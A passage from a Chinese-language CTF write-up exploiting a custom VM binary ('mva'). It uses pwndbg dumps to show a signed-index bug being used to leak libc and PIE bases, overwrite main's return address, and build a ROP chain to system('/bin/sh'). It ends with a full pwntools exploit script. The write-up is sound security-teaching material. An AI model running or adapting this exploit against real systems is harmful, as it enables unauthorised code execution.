03:00180x7fff54fd5498 ◂— 0x0 /* v11 */
... ↓ 2 skipped
06:00300x7fff54fd54b0 —▸ 0x7f518679a700 —▸ 0x7f518679a190 —▸ 0x55e14e436000 ◂— 0x10102464c457f /* v12[8-11](target) */
1
2
3
0x55e14e437a20    call   printf@plt                <printf@plt>
format: 0x55e14e43804a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0xa700 /* v12[8] */
  • v9 = 9 :
1
2
3
4
5
6
7
8
pwndbg> telescope 0x7fff54fd5480
00:00000x7fff54fd5480 ◂— 9 /* v9=9 */
01:00080x7fff54fd5488 ◂— 0x1
02:00100x7fff54fd5490 ◂— 0xb1bc9cd4 /* v10 */
03:00180x7fff54fd5498 ◂— 0x0 /* v11 */
... ↓ 2 skipped
06:00300x7fff54fd54b0 —▸ 0x7f5186790000 ◂— 's (%s%%)\n' /* v12[8-11](target) */
07:00380x7fff54fd54b8 —▸ 0x7f518676a680 ◂— 0x7f518676a680
1
2
3
0x55e14e437a20    call   printf@plt                <printf@plt>
format: 0x55e14e43804a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x8679 /* v12[9] */
  • v9 = 10 :
1
2
3
4
5
6
7
8
pwndbg> telescope 0x7fff54fd5480
00:00000x7fff54fd5480 ◂— 0xa /* v9=10 */
01:00080x7fff54fd5488 ◂— 0x1
02:00100x7fff54fd5490 ◂— 0xb1bc9cd4 /* v10 */
03:00180x7fff54fd5498 ◂— 0x0 /* v11 */
... ↓ 2 skipped
06:00300x7fff54fd54b0 ◂— 0x7f5100000000 /* v12[8-11](target) */
07:00380x7fff54fd54b8 —▸ 0x7f518676a680 ◂— 0x7f518676a680
1
2
3
0x55e14e437a20    call   printf@plt                <printf@plt>
format: 0x55e14e43804a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x7f51 /* v12[10] */

libc_base 成功泄露,接下来看泄露 pro_base 的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
pay = push() # 没什么用,只是为了调试而已
pay += ldr(0,0,0xf4) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
pay += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)
pay += sh() + push() + sh() + push() + sh()
pay = pay.ljust(0x100, b'\x00')

p.send(pay)

p.recvuntil('[+] MVA is starting ...\n')
a = int(p.recv(6)[:-1])
log.success("a: " + hex(a))
b = int(p.recv(6)[:-1])
log.success("b: " + hex(b))
c = int(p.recv(6)[:-1])
log.success("c: " + hex(c))
d = (c << 32) | (b << 16) | a
log.success("d: " + hex(d))
elfbase = d - 0x1a70
log.success("elfbase: " + hex(elfbase))
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7ffcefc61160
00:00000x7ffcefc61160 ◂— 0x1 /* v9=1 */
01:00080x7ffcefc61168 ◂— 0x1
02:00100x7ffcefc61170 ◂— 0x6aa66cd4 /* v10 */
03:00180x7ffcefc61178 ◂— 0x0 /* v11 */
04:00200x7ffcefc61180 ◂— 0x0 /* v12[start] */
05:00280x7ffcefc61188 ◂— 0x1
06:00300x7ffcefc61190 —▸ 0x7f406df3e700 —▸ 0x7f406df3e190 —▸ 0x564995599000 ◂— 0x10102464c457f
07:00380x7ffcefc61198 —▸ 0x7f406df0e680 ◂— 0x7f406df0e680
  • 4 个 ldr 执行完毕后:
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7ffcefc61160
00:00000x7ffcefc61160 ◂— 0x1 /* v9=1 */
01:00080x7ffcefc61168 ◂— 0x1
02:00100x7ffcefc61170 ◂— 0xf46aa66cd4 /* v10[0]:f4 */
03:00180x7ffcefc61178 ◂— 0x80000000 /* v10[3]:0x80000000 */
04:00200x7ffcefc61180 ◂— 0x0 /* v12[start] */
05:00280x7ffcefc61188 ◂— 0x1
06:00300x7ffcefc61190 —▸ 0x7f406df3e700 —▸ 0x7f406df3e190 —▸ 0x564995599000 ◂— 0x10102464c457f
07:00380x7ffcefc61198 —▸ 0x7f406df0e680 ◂— 0x7f406df0e680
1
2
3
pwndbg> x/20xw 0x7ffcefc61170 /* v10被强转为2byte(注意小端序) */
0x7ffcefc61170: 0x6aa66cd4 0x000000f4 0x80000000 0x00000000
0x7ffcefc61180: 0x00000000 0x00000000 0x00000001 0x00000000
  • 4 个 mv 执行完毕后:
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7ffcefc61160
00:00000x7ffcefc61160 ◂— 0x80000000000000f4 /* v9 */
01:00080x7ffcefc61168 ◂— 0x1 /* v10 */
02:00100x7ffcefc61170 ◂— 0xf46aa66cd4
03:00180x7ffcefc61178 ◂— 0x80000000
04:00200x7ffcefc61180 ◂— 0x0 /* v12[start] */
05:00280x7ffcefc61188 ◂— 0x1
06:00300x7ffcefc61190 —▸ 0x7f406df3e700 —▸ 0x7f406df3e190 —▸ 0x564995599000 ◂— 0x10102464c457f
07:00380x7ffcefc61198 —▸ 0x7f406df0e680 ◂— 0x7f406df0e680
1
2
3
4
5
pwndbg> x/20xw 0x7ffcefc61160 
0x7ffcefc61160: 0x000000f4 0x80000000 0x00000001 0x00000000
0x7ffcefc61170: 0x6aa66cd4 0x000000f4 0x80000000 0x00000000
/* v10[0] to v10[-10] */
/* v10[3] to v10[-7] */

发现v9出现异常,这里解释一下:

1
2
3
#define SBYTEn(x, n)   (*((int8*)&(x)+n))
#define SBYTE1(x) SBYTEn(x, 1)
#define SBYTE2(x) SBYTEn(x, 2)

因为“SBYTEn”和“SBYTEn”是“int8”类型,所以“0xf6”被识别为“-9”,“0xf7”被识别为“-8”……

导致“v10[-10]”,“v10[-7]”分别被写入“v10[0]”,“v10[3]”,最终导致“v9”被覆盖

  • v9 = 0x80000000000000f4
1
2
3
0x56499559aa20    call   printf@plt                <printf@plt>
format: 0x56499559b04a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0xaa70
1
2
3
4
5
6
7
8
In [5]: 0x80000000000000f4*2
Out[5]: 18446744073709552104

In [6]: 0x7ffcefc61180+18446744073709552104
Out[6]: 18446884798040773480

In [7]: hex(18446884798040773480) /* 直接舍弃溢出的部分 */
Out[7]: '0x100007ffcefc61368'
1
2
3
4
5
6
7
pwndbg> telescope 0x7ffcefc61368 /* 发现目标数据 */
00:00000x7ffcefc61368 ◂— 0x56499559aa70 /* v12[0x80000000000000f4] */
01:00080x7ffcefc61370 ◂— 0x0
02:00100x7ffcefc61378 —▸ 0x56499559a100 ◂— endbr64
03:00180x7ffcefc61380 —▸ 0x7ffcefc61480 ◂— 0x1
04:00200x7ffcefc61388 ◂— 0x39d2b6d7df852f00
05:0028│ rbp 0x7ffcefc61390 ◂— 0x0
  • v9 = 0x80000000000000f5
1
2
3
0x56499559aa20    call   printf@plt                <printf@plt>
format: 0x56499559b04a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x9559
1
2
3
4
5
6
7
pwndbg> telescope 0x7ffcefc61368
00:00000x7ffcefc61368 ◂— 0x5649955900f4 /* v12[0x80000000000000f5] */
01:00080x7ffcefc61370 ◂— 0x0
02:00100x7ffcefc61378 —▸ 0x56499559a100 ◂— endbr64
03:00180x7ffcefc61380 —▸ 0x7ffcefc61480 ◂— 0x1
04:00200x7ffcefc61388 ◂— 0x39d2b6d7df852f00
05:0028│ rbp 0x7ffcefc61390 ◂— 0x0
  • v9 = 0x80000000000000f6
1
2
3
0x56499559aa20    call   printf@plt                <printf@plt>
format: 0x56499559b04a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x5649
1
2
3
4
5
6
7
pwndbg> telescope 0x7ffcefc61368
00:00000x7ffcefc61368 ◂— 0x564900f400f4 /* v12[0x80000000000000f6] */
01:00080x7ffcefc61370 ◂— 0x0
02:00100x7ffcefc61378 —▸ 0x56499559a100 ◂— endbr64
03:00180x7ffcefc61380 —▸ 0x7ffcefc61480 ◂— 0x1
04:00200x7ffcefc61388 ◂— 0x39d2b6d7df852f00
05:0028│ rbp 0x7ffcefc61390 ◂— 0x0

pro_base 成功泄露,leak 完毕,接下来需要覆盖 ret 再次执行 main:

1
2
3
4
5
6
7
8
9
10
11
12
pay =  push() # 没什么用,只是为了调试而已
pay += ldr(0,0,0xff) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
pay += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)
pay += pop(0) + sh() + pop(1) + sh()
pay += ldr(2,1,0xe) + ldr(3,0,0) + ldr(4,0,0) + ldr(5,0x80,0)
pay += mv(2,0xf6) + mv(3,0xf7) + mv(4,0xf8) + mv(5,0xf9) + push()
pay += mv(1,0) + pop(1) + pop(1) + push()
pay += ldr(0,0x51,0) + pop(1) + pop(1) + push()

pay = pay.ljust(0x100-1, b'\x00')

p.send(pay)
  • 4 个 ldr 和 4 个 mv 执行完毕后:
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7ffd83e7d050
00:00000x7ffd83e7d050 ◂— 0x80000000000000ff /* v9 */
01:00080x7ffd83e7d058 ◂— 0x1
02:00100x7ffd83e7d060 ◂— 0xff9165dcd4 /* v10[start] */
03:00180x7ffd83e7d068 ◂— 0x80000000 /* v11 */
04:00200x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:00280x7ffd83e7d078 ◂— 0x1
06:00300x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:00380x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680
  • 第一次执行 pop :
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7ffd83e7d050
00:00000x7ffd83e7d050 ◂— 0x80000000000000fe /* v9=0x80000000000000fe */
01:00080x7ffd83e7d058 ◂— 0x1
02:00100x7ffd83e7d060 ◂— 0x56069165dcd4 /* v10[0]=0x5606 */
03:00180x7ffd83e7d068 ◂— 0x80000000
04:00200x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:00280x7ffd83e7d078 ◂— 0x1
06:00300x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:00380x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680
1
2
3
0x56066e9a3a20    call   printf@plt                <printf@plt>
format: 0x56066e9a404a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x5606
1
2
3
4
5
6
7
8
In [4]: (0x80000000000000ff-1)*2 /* 注意"[--v9]"" */
Out[4]: 18446744073709552124

In [5]: 0x7ffd83e7d070+18446744073709552124
Out[5]: 18446884800526013036

In [6]: hex(18446884800526013036)
Out[6]: '0x100007ffd83e7d26c'
1
2
3
4
pwndbg> telescope 0x7ffd83e7d26c
00:00000x7ffd83e7d26c ◂— 0x83e7d37000005606 /* target */
01:00080x7ffd83e7d274 ◂— 0x5793bc0000007ffd
02:0010│ rbp-4 0x7ffd83e7d27c ◂— 0x93e7a31e
  • 第二次执行 pop :
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7ffd83e7d050
00:00000x7ffd83e7d050 ◂— 0x80000000000000fd /* v9=0x80000000000000fd */
01:00080x7ffd83e7d058 ◂— 0x1
02:00100x7ffd83e7d060 ◂— 0x6e9a56069165dcd4 /* v10 */
03:00180x7ffd83e7d068 ◂— 0x80000000
04:00200x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:00280x7ffd83e7d078 ◂— 0x1
06:00300x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:00380x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680
1
2
3
0x56066e9a3a20    call   printf@plt                <printf@plt>
format: 0x56066e9a404a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x6e9a
1
2
3
4
5
6
7
8
In [7]: (0x80000000000000fe-1)*2 /* 注意"[--v9]"" */
Out[7]: 18446744073709552122

In [8]: 0x7ffd83e7d070+18446744073709552122
Out[8]: 18446884800526013034

In [9]: hex(18446884800526013034)
Out[9]: '0x100007ffd83e7d26a'
1
2
3
4
pwndbg> telescope 0x7ffd83e7d26a 
00:00000x7ffd83e7d26a ◂— 0xd370000056066e9a /* target */
01:00080x7ffd83e7d272 ◂— 0xbc0000007ffd83e7
02:0010│ rbp-6 0x7ffd83e7d27a ◂— 0x93e7a31e5793

这里的操作证明了:可以通过 ldr mv 修改“v9”的方式使程序错误定位“v12[target]”,而入在 pop 时把错误数据写入“v10”,那么接下来的 push 输入的值“v10”就可以被控制,就可以利用这一点来覆盖程序的返回地址

  • 4 个 ldr 和 4 个 mv 执行完毕后:
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7ffd83e7d050
00:00000x7ffd83e7d050 ◂— 0x800000000000010e /* v9 */
01:00080x7ffd83e7d058 ◂— 0x1
02:00100x7ffd83e7d060 ◂— 0x6e9a56069165dcd4 /* v10[start] */
03:00180x7ffd83e7d068 ◂— 0x800000000000010e
04:00200x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:00280x7ffd83e7d078 ◂— 0x1
06:00300x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:00380x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680
1
2
3
4
5
6
7
8
In [10]: 0x800000000000010e*2
Out[10]: 18446744073709552156

In [11]: 0x7ffd83e7d070+18446744073709552156
Out[11]: 18446884800526013068

In [12]: hex(18446884800526013068)
Out[12]: '0x100007ffd83e7d28c'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
pwndbg> telescope 0x7ffd83e7d28c
00:00000x7ffd83e7d28c ◂— 0xff1a62000007fa3
01:00080x7ffd83e7d294 ◂— 0x83e7d37800007fa3
02:00100x7ffd83e7d29c ◂— 0x7ffd
03:00180x7ffd83e7d2a4 ◂— 0x6e9a32aa00000001
04:00200x7ffd83e7d2ac ◂— 0x6e9a3a7000005606
05:00280x7ffd83e7d2b4 ◂— 0x91fbed9200005606
06:00300x7ffd83e7d2bc ◂— 0x6e9a310090176fc9
07:00380x7ffd83e7d2c4 ◂— 0x83e7d37000005606

pwndbg> telescope 0x7ffd83e7d28c-4
00:00000x7ffd83e7d288 —▸ 0x7fa30fd1d0b3 (__libc_start_main+243) ◂— mov edi, eax
01:00080x7ffd83e7d290 —▸ 0x7fa30ff1a620 (_rtld_global_ro) ◂— 0x50d1300000000
02:00100x7ffd83e7d298 —▸ 0x7ffd83e7d378 —▸ 0x7ffd83e7f39d ◂— 0x4a470061766d2f2e /* './mva' */
03:00180x7ffd83e7d2a0 ◂— 0x100000000
04:00200x7ffd83e7d2a8 —▸ 0x56066e9a32aa ◂— endbr64

在 ldr mv 和配合下,程序成功通过“v9”定位到了返回地址,接下来就要进行覆盖了

  • 执行 push 进行第一次覆盖:
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7ffd83e7d050
00:00000x7ffd83e7d050 ◂— 0x800000000000010f /* v9 */
01:00080x7ffd83e7d058 ◂— 0x1
02:00100x7ffd83e7d060 ◂— 0x6e9a56069165dcd4 /* v10[0]=0x5606 */
03:00180x7ffd83e7d068 ◂— 0x800000000000010e
04:00200x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:00280x7ffd83e7d078 ◂— 0x1
06:00300x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:00380x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680
1
2
3
4
pwndbg> telescope 0x7ffd83e7d28c-4 /* 返回地址[0-1]被覆盖为"0x5606" */
00:00000x7ffd83e7d288 ◂— 0x56060fd1d0b3
01:00080x7ffd83e7d290 —▸ 0x7fa30ff1a620 (_rtld_global_ro) ◂— 0x50d1300000000
02:00100x7ffd83e7d298 —▸ 0x7ffd83e7d378 —▸ 0x7ffd83e7f39d ◂— 0x4a470061766d2f2e /* './mva' */
  • 执行 push 进行第二次覆盖:
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7ffd83e7d050
00:00000x7ffd83e7d050 ◂— 0x800000000000010e /* v9 */
01:00080x7ffd83e7d058 ◂— 0x1
02:00100x7ffd83e7d060 ◂— 0xfd16e9a9165dcd4 /* v10[0]=0x6e9a */
03:00180x7ffd83e7d068 ◂— 0x800000000000010e
04:00200x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:00280x7ffd83e7d078 ◂— 0x1
06:00300x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:00380x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680
1
2
3
4
pwndbg> telescope 0x7ffd83e7d28c-4 /* 返回地址[1-3]被覆盖为"0x6e9a" */
00:00000x7ffd83e7d288 ◂— 0x56066e9ad0b3
01:00080x7ffd83e7d290 —▸ 0x7fa30ff1a620 (_rtld_global_ro) ◂— 0x50d1300000000
02:00100x7ffd83e7d298 —▸ 0x7ffd83e7d378 —▸ 0x7ffd83e7f39d ◂— 0x4a470061766d2f2e /* './mva' */
  • 执行 push 进行第三次覆盖:
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7ffd83e7d050
00:00000x7ffd83e7d050 ◂— 0x800000000000010d /* v9 */
01:00080x7ffd83e7d058 ◂— 0x1
02:00100x7ffd83e7d060 ◂— 0xd0b351009165dcd4 /* v10[0]=0x5100 */
03:00180x7ffd83e7d068 ◂— 0x800000000000010e
04:00200x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:00280x7ffd83e7d078 ◂— 0x1
06:00300x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:00380x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680
1
2
3
4
pwndbg> telescope 0x7ffd83e7d28c-4
00:00000x7ffd83e7d288 —▸ 0x56066e9a5100 ◂— 0x14
01:00080x7ffd83e7d290 —▸ 0x7fa30ff1a620 (_rtld_global_ro) ◂— 0x50d1300000000
02:00100x7ffd83e7d298 —▸ 0x7ffd83e7d378 —▸ 0x7ffd83e7f39d ◂— 0x4a470061766d2f2e /* './mva' */

成功覆盖 main 的返回地址,因为程序开了PIE,所以每次攻击都有很小的概率可以命中“start”(至于组成“start”各个部分,都是在程序中找的,先利用 ldr mv 进行定位,再用 pop 将其赋值给“v10”)

1
2
3
4
5
.text:0000562438CCC100 ; void __fastcall __noreturn start(__int64, __int64, void (*)(void))
.text:0000562438CCC100 public start
.text:0000562438CCC100 start proc near
.text:0000562438CCC100 ; __unwind {
.text:0000562438CCC100 endbr64

我们已经成功泄露了 libc_base 和 pro_base,并且覆盖了返回地址,那么下一次输入就可以执行攻击了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
payload =  ldr(0,1,0xc) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0) 
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(pop_rdi1)
payload += b'\x09\x01'+p16(pop_rdi2)

payload += ldr(0,1,0x10) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(binsh1)
payload += b'\x09\x01'+p16(binsh2)
payload += b'\x09\x01'+p16(binsh3)

payload += ldr(0,1,0x14) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(ret1)
payload += b'\x09\x01'+p16(ret2)
payload += b'\x09\x01'+p16(ret3)

payload += ldr(0,1,0x18) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(system1)
payload += b'\x09\x01'+p16(system2)
payload += b'\x09\x01'+p16(system3)
payload += b'\x09\x01'+p16(0)

payload += p32(0x8) + p32(0xE4000000)
payload = payload.ljust(0x38*4,b'\x00')

payload += p32(8) + p32(0)
payload = payload.ljust(0xf8,b'\x00')
payload += b'/bin/sh\x00'

p.send(payload)

其实这里的操作和前面类似,指令 ldr mv 修改“v9”,指令 push 通过“v9”索引到目标位置,然后把数据分段覆盖上去

我们看一下效果:

1
2
3
4
5
/* 第一次:覆盖ret为pop rdi */
pwndbg> telescope 0x7ffefad1a128
00:00000x7ffefad1a128 —▸ 0x7f4561689b72 (init_cacheinfo+242) ◂— pop rdi
01:00080x7ffefad1a130 ◂— 0x98000000980
02:00100x7ffefad1a138 —▸ 0x7ffefad1a218 —▸ 0x7ffefad1a2f8 —▸ 0x7ffefad1c39d ◂— 0x4a470061766d2f2e /* './mva' */
1
2
3
4
5
/* 第二次: 填入"/bin/sh"的地址(利用pro_base计算出来的) */
pwndbg> telescope 0x7ffefad1a128
00:00000x7ffefad1a128 —▸ 0x7f4561689b72 (init_cacheinfo+242) ◂— pop rdi
01:00080x7ffefad1a130 —▸ 0x5593c1a08138 ◂— 0x68732f6e69622f /* '/bin/sh' */
02:00100x7ffefad1a138 —▸ 0x7ffefad1a218 —▸ 0x7ffefad1a2f8 —▸ 0x7ffefad1c39d ◂— 0x4a470061766d2f2e /* './mva' */
1
2
3
4
5
6
/* 覆盖上ret用于平衡栈帧 */
pwndbg> telescope 0x7ffefad1a128
00:00000x7ffefad1a128 —▸ 0x7f4561689b72 (init_cacheinfo+242) ◂— pop rdi
01:00080x7ffefad1a130 —▸ 0x5593c1a08138 ◂— 0x68732f6e69622f /* '/bin/sh' */
02:00100x7ffefad1a138 —▸ 0x7f4561688679 (__libgcc_s_init+61) ◂— ret
03:00180x7ffefad1a140 ◂— 0x6188762000000000
1
2
3
4
5
6
/* 最后覆盖上system */
pwndbg> telescope 0x7ffefad1a128
00:00000x7ffefad1a128 —▸ 0x7f4561689b72 (init_cacheinfo+242) ◂— pop rdi
01:00080x7ffefad1a130 —▸ 0x5593c1a08138 ◂— 0x68732f6e69622f /* '/bin/sh' */
02:00100x7ffefad1a138 —▸ 0x7f4561688679 (__libgcc_s_init+61) ◂— ret
03:00180x7ffefad1a140 —▸ 0x7f45616b82c0 (system) ◂— endbr64

完整exp:(可能需要多爆破几次,有时泄露的信息不对,有时出现错误)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
#!/usr/bin/python3

from pwn import *
context.arch='amd64'

elf=ELF('./mva')
libc = ELF('./libc-2.31.so')
p=process('./mva')

def pack(op:int, p1:int = 0, p2:int = 0, p3:int = 0) -> bytes:
return (op&0xff).to_bytes(1,'little') + \
(p1&0xff).to_bytes(1,'little') + \
(p2&0xff).to_bytes(1,'little') + \
(p3&0xff).to_bytes(1,'little')

def ldr(p1,p2,p3):
return pack(0x01, p1, p2, p3)

def add(p1, p2, p3):
return pack(0x02, p1, p2, p3)

def sub(p1, p2, p3):
return pack(0x03, p1, p2, p3)

def shr(p1, p2):
return pack(0x06, p1, p2)

def xor(p1, p2, p3):
return pack(0x07, p1, p2, p3)

def push():
return pack(0x09)

def pop(p1):
return pack(0x0a, p1)

def mul(p1, p2, p3):
return pack(0x0D, p1, p2, p3)

def mv(p1, p2):
return pack(0x0E, p1, p2)

def sh():
return pack(0x0F)

p.recvuntil('[+] Welcome to MVA, input your code now :\n')

while True:
try:
p=process('./mva')
sleep(0.01)

pay = push()*8
pay += sh()+push()+sh()+push()+sh()
pay += ldr(0,0,0xf4) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
pay += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)
pay += sh() + push() + sh() + push() + sh()

pay += ldr(0,0,0xff) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
pay += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)
pay += pop(0) + sh() + pop(1) + sh()
pay += ldr(2,1,0xe) + ldr(3,0,0) + ldr(4,0,0) + ldr(5,0x80,0)
pay += mv(2,0xf6) + mv(3,0xf7) + mv(4,0xf8) + mv(5,0xf9) + push()
pay += mv(1,0) + pop(1) + pop(1) + push()
pay += ldr(0,0x51,0) + pop(1) + pop(1) + push()

pay = pay.ljust(0x100, b'\x00')

p.send(pay)

p.recvuntil('[+] MVA is starting ...\n')
a = int(p.recv(6)[:-1])
log.success("a: " + hex(a))
b = int(p.recv(6)[:-1])
log.success("b: " + hex(b))
c = int(p.recv(6)[:-1])
log.success("c: " + hex(c))
d = (c << 32) | (b << 16) | a
log.success("d: " + hex(d))
libc.address = d - 0x223700
log.success("libc.address: " + hex(libc.address))

a = int(p.recv(6)[:-1])
log.success("a: " + hex(a))
b = int(p.recv(6)[:-1])
log.success("b: " + hex(b))
c = int(p.recv(6)[:-1])
log.success("c: " + hex(c))
d = (c << 32) | (b << 16) | a
log.success("d: " + hex(d))
elfbase = d - 0x1a70
log.success("elfbase: " + hex(elfbase))

pop_rdi = libc.address + 0x23b72
log.success("pop_rdi: " + hex(pop_rdi))

ret = libc.address + 0x22679
ret1 = ret & 0xffff
ret1 = ((ret1&0xff00)>>8) + ((ret1&0xff) << 8)
ret2 = (ret & 0xffffffff)>>16
ret2 = ((ret2&0xff00)>>8) + ((ret2&0xff) << 8)
ret3 = (ret)>>32
ret3 = ((ret3&0xff00)>>8) + ((ret3&0xff) << 8)

system = libc.sym['system']
log.success("system: " + hex(system))
system1 = system & 0xffff
system1 = ((system1&0xff00)>>8) + ((system1&0xff) << 8)
log.success("system1: " + hex(system1))
system2 = (system & 0xffffffff)>>16
system2 = ((system2&0xff00)>>8) + ((system2&0xff) << 8)
log.success("system2: " + hex(system2))
system3 = (system)>>32
system3 = ((system3&0xff00)>>8) + ((system3&0xff) << 8)
log.success("system3: " + hex(system3))

pop_rdi1 = pop_rdi & 0xffff
pop_rdi1 = ((pop_rdi1&0xff00)>>8) + ((pop_rdi1&0xff) << 8)
log.success("pop_rdi1: " + hex(pop_rdi1))
pop_rdi2 = (pop_rdi & 0xffffffff)>>16
pop_rdi2 = ((pop_rdi2&0xff00)>>8) + ((pop_rdi2&0xff) << 8)
log.success("pop_rdi2: " + hex(pop_rdi2))

binsh = elfbase + 0x4138
log.success("binsh: " + hex(binsh))
binsh1 = binsh & 0xffff
binsh1 = ((binsh1&0xff00)>>8) + ((binsh1&0xff) << 8)
log.success("binsh1: " + hex(binsh1))
binsh2 = (binsh & 0xffffffff)>>16
binsh2 = ((binsh2&0xff00)>>8) + ((binsh2&0xff) << 8)
log.success("binsh2: " + hex(binsh2))
binsh3 = (binsh)>>32
binsh3 = ((binsh3&0xff00)>>8) + ((binsh3&0xff) << 8)
log.success("binsh3: " + hex(binsh3))

p.recvuntil('[+] Welcome to MVA, input your code now :\n')
except EOFError:
p.close()
continue
else:
success("Success!!!")
pause()

payload = ldr(0,1,0xc) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(pop_rdi1)
payload += b'\x09\x01'+p16(pop_rdi2)

payload += ldr(0,1,0x10) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(binsh1)
payload += b'\x09\x01'+p16(binsh2)
payload += b'\x09\x01'+p16(binsh3)

payload += ldr(0,1,0x14) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(ret1)
payload += b'\x09\x01'+p16(ret2)
payload += b'\x09\x01'+p16(ret3)

payload += ldr(0,1,0x18) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(system1)
payload += b'\x09\x01'+p16(system2)
payload += b'\x09\x01'+p16(system3)
payload += b'\x09\x01'+p16(0)

payload += p32(0x8) + p32(0xE4000000)
payload = payload.ljust(0x38*4,b'\x00')

payload += p32(8) + p32(0)
payload = payload.ljust(0xf8,b'\x00')
payload += b'/bin/sh\x00'

#gdb.attach(p)

p.send(payload)
p.interactive()

小结

